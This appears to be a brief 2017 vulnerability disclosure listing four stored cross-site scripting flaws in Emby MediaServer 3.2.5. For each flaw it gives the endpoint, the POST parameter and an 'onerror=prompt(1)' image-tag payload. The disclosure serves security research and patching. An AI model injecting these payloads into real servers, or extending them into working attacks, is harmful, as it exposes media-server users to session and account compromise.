Emby MediaServer 3.2.5 - Stored XSS (0-day)

New vulnerability uncovered


Another breach found by our research lab, on the emby MediaServer 3.2.5 (Stored XSS)

Exploit Title : Emby MediaServer 3.2.5 - Stored XSS
Google Dork :    -
Date : 28/05/2017
Type : webapps
Platform: PHP
Vendor Homepage : http://emby.media

--------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost:8096/emby/Users/[userid]
Method: Post
Vulnerable Parameters : Name
Payload:<img src=i onerror=prompt(1)>
-------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost:8096/emby/System/Configuration
Method: Post
Vulnerable Parameters : ServerName
Payload:<img src=i onerror=prompt(1)>
-------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost:8096/emby/Library/VirtualFolders/Paths/Update
Method: Post
Vulnerable Parameters : NetworkPath
Payload:<img src=i onerror=prompt(1)>
-------------------------------
Type: Stored XSS
Vulnerable URL: http://localhost:8096/emby/Items/[]
Method: Post
Vulnerable Parameters : Name
Payload:<img src=i onerror=prompt(1)>

-------------------------------